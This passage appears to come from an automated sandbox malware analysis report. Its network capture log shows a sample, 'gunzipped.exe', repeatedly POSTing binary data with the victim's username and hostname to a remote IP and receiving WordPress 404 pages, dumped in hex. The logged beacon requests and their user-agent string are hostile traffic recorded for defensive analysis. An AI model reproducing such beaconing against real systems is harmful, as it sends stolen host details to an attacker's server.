                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:21.904087067 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:21.904154062 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:21.904191017 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:21.904230118 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:21.904268026 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:21.904308081 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          20192.168.2.549732136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:22.632421017 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:22.840864897 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:23.789892912 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:22 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:23.789954901 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:23.789995909 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:23.790035963 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:23.790076017 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:23.790116072 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:23.790159941 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:23.790198088 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:23.790235996 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:23.790277004 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          21192.168.2.549733136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:24.136610985 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:24.340434074 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:25.303402901 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:24 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:25.303467035 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:25.303505898 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:25.303550005 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:25.303592920 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:25.303631067 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:25.303669930 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:25.303711891 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
